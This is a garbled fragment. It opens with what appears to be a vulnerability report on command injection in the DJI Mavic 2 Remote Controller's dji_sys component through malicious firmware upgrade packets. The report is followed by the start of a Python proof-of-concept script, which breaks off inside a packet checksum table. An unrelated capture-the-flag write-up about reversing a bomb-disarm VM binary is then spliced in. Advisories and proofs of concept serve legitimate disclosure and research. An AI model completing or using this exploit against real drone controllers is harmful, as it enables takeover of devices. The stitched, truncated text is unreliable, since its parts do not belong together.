| [Suggested description] | |
| A command injection issue in | |
| dji_sys in DJI Mavic 2 Remote Controller before firmware version 01.00.0510 allows for code execution via a malicious firmware upgrade packet. | |
| ------------------------------------------ | |
| [VulnerabilityType Other] | |
| Command injection | |
| ------------------------------------------ |
| #!/usr/bin/python | |
| # https://github.com/mefistotelis/phantom-firmware-tools/issues/25 | |
| # as shared by GlovePuppet | |
| import struct | |
| def calc_pkt55_hdr_checksum(seed, packet, plength): | |
| arr_2A103 = [0x00,0x5E,0xBC,0xE2,0x61,0x3F,0xDD,0x83,0xC2,0x9C,0x7E,0x20,0xA3,0xFD,0x1F,0x41, | |
| 0x9D,0xC3,0x21,0x7F,0xFC,0xA2,0x40,0x1E,0x5F,0x01,0xE3,0xBD,0x3E,0x60,0x82,0xDC, | |
| 0x23,0x7D,0x9F,0xC1,0x42,0x1C,0xFE,0xA0,0xE1,0xBF,0x5D,0x03,0x80,0xDE,0x3C,0x62, |
Somebody set up us the bomb. Our only chance of survival is to input the disarm code. Unfortunately, the bomb is a really strange device.
From the provided tarball we recieve a unstripped 32-bit ELF binary, our "VM", and a ~900 byte file for our binary to interpret. Reversing the instructions used is trivial, but we couldn't be bothered debugging the thing in GDB.
So we messed around a bit with ltrace:
